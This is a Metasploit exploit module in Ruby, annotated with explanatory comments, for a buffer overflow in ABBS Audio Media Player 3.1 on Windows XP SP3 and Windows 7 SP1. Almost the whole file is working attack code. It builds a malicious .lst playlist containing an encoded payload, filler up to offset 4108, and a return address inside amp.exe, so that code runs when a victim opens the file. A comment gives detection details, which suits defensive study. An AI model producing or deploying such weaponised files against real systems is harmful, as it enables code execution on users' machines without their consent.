##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format exploit module for ABBS Audio Media Player. It writes a malformed
# .lst playlist file to disk (through the FILEFORMAT mixin's file_create) that
# the description says overflows a buffer when the player loads it. The code
# below produces only that file; nothing is sent over the network despite the
# Remote base class. For detection purposes the artefact is a .lst file of
# 'Offset' + 4 bytes (payload, random filler, 4-byte return address) opened by
# amp.exe.
class MetasploitModule < Msf::Exploit::Remote
  # Framework reliability ranking for this exploit.
  Rank = NormalRanking

  # Supplies the FILENAME option and the file_create helper used in #exploit.
  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata (name, description, references, payload
  # constraints and the single target) with the framework and adds the
  # FILENAME option that names the generated file.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ABBS Audio Media Player .LST Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability
        occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges
        of the user running the application. This module has been tested successfully on
        ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julian Ahrens', # Vulnerability discovery and PoC
          'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '75096' ],
          [ 'EDB', '25204' ]
        ],
      'DefaultOptions' =>
        {
          # Default exit technique for the payload.
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # Bytes the encoder must keep out of the payload: NUL, LF and CR —
          # presumably because the .lst file is parsed as line-oriented text.
          'BadChars' => "\x00\x0a\x0d",
          # No NOP sled is prepended; the payload starts the buffer (see #exploit).
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'    => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
              # Byte position in the file at which 'Ret' is written (see #exploit).
              'Offset' => 4108,
            }
          ]
        ],
      # Code runs with the privileges of the user who opens the file, per the description.
      'Privileged'     => false,
      'DisclosureDate' => '2013-06-30',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),
      ])

  end

  # Builds the file contents and writes them out. Layout: the encoded payload,
  # random filler up to target['Offset'], then the 4-byte return address, so
  # for a payload no longer than 'Offset' the file is 'Offset' + 4 bytes.
  def exploit
    buffer = payload.encoded
    # Random filler from the end of the payload up to the return-address offset.
    # NOTE(review): payload.encoded is evaluated a second time here; this relies
    # on the framework returning the same bytes as the call above — confirm.
    buffer << rand_text(target['Offset'] - (payload.encoded.length))
    # 'V' packs the address as a 32-bit unsigned little-endian integer.
    buffer << [target.ret].pack('V')

    # Writes the buffer to the file named by the FILENAME option.
    file_create(buffer)
  end
end